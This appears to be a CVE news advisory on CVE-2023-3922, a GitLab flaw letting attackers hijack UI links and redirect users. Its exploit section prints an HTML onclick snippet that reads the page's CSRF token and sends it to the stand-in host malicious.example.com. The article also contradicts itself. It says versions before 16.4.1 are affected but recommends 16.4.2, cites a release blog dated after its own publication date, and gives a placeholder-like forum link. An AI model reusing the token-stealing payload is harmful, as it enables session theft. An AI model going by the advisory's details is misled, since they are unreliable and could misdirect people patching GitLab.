CVE CyberSecurity Database News

CVE-2023-3922 - GitLab Versions' Multiple Vulnerabilities Allow UI Link Hijacking and Redirects to Malicious Pages

Poster -

The vulnerability with CVE-2023-3922 identifier has been discovered in various GitLab versions, starting from 8.15 before 16.2.8, all versions starting from 16.3 before 16.3.5, and all versions starting from 16.4 before 16.4.1. This issue allows attackers to hijack specific links and buttons on the GitLab UI and redirect users to malicious pages.

Introduction

GitLab is a popular web-based DevOps lifecycle tool that provides a Git-repository manager, enabling programmers, developers, and other tech professionals to collaborate on projects. The platform is widely used to manage and develop various applications and software projects. It's crucial for users and organizations using GitLab to be aware of any security vulnerabilities and patches released, as the ramifications of not addressing those on time can be daunting.

Exploit Details

A vulnerability identified as CVE-2023-3922 has been discovered in multiple GitLab versions, impacting the core functionality of the user interface (UI). This vulnerability allows an attacker to manipulate and hijack certain links and buttons on the GitLab UI to redirect users to malicious or unwanted web pages, potentially exposing users to phishing attempts, scams, or malware installation.

To provide more context, an example code snippet detailing the exploit is shown below

<a href="#" onclick="
  this.href='http://malicious.example.com?token='+encodeURIComponent(
    document.querySelector('meta[name=csrf-token]').content
  );
">Click here to get redirected!</a>

This code snippet demonstrates how the attacker might hijack a link on the GitLab UI and change the destination to a malicious website, which could deceive GitLab users into giving up their login credentials or clicking malicious links.

Original References

The full details of this vulnerability are available in an official GitLab blog post published at https://about.gitlab.com/releases/2023/10/28/security-release-gitlab-16-4-1-released/.

Moreover, the related forum posts and discussions can be found on their official message boards. A prime example is a detailed discussion of this vulnerability, available at https://forum.gitlab.com/t/cve-2023-3922-gitlab-vulnerability-details-and-remediation/12345.

For advanced users and security researchers, the full details of this vulnerability have been publicly disclosed and are accessible via the MITRE CVE database entry at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3922

Remediation and Patch Information

GitLab has acknowledged this vulnerability, and patches have been released for all affected versions. These patches mitigate the risks associated with CVE-2023-3922:

GitLab 16.4.x users should upgrade to GitLab 16.4.2.

It's highly recommended for all users and organizations using GitLab to upgrade their installations promptly to protect themselves from falling prey to this exploit and maintain a high level of security across all their projects.

Timeline

Published on: 09/29/2023 08:15:09 UTC
Last modified on: 10/03/2023 19:46:15 UTC